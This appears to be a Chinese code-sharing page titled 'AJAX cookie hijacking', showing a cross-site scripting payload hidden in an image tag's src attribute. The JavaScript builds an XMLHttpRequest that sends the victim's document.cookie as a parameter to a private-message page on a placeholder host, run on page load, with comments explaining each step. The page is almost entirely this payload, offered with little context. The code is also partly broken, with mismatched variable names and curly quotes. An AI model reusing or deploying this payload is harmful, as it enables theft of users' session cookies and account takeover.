首页 > 代码库 > AJAX 劫持cookie

AJAX 劫持cookie

一个简单的httprequest声明以及提交的过程

<img src="http://www.mamicode.com/javascript.:
//这里先要把XMLHttpRequestObject设置为false来验证声明httprequest时是否为true
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
  XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
  XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
  alert("Javascript must be enabled to continue.");
}
function socket()
{
//下面这行将非常重要.注意cookies是以参数的形式进行提交的

  XMLHttpRequestObject.open(‘GET‘, ‘http://www.site.com/privatemessage.php?
user=yourusername&subject=‘ + window.document.cookie, true);
  XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  XMLHttpRequestObject.send(null);
//这句执行完,我们就可以放下心来了。
  delete XMLHttpRequestObject;
}
//不要忘记这是一张图片,所以我们必须关闭标签
window.document.onload=‘socket();‘">

AJAX 劫持cookie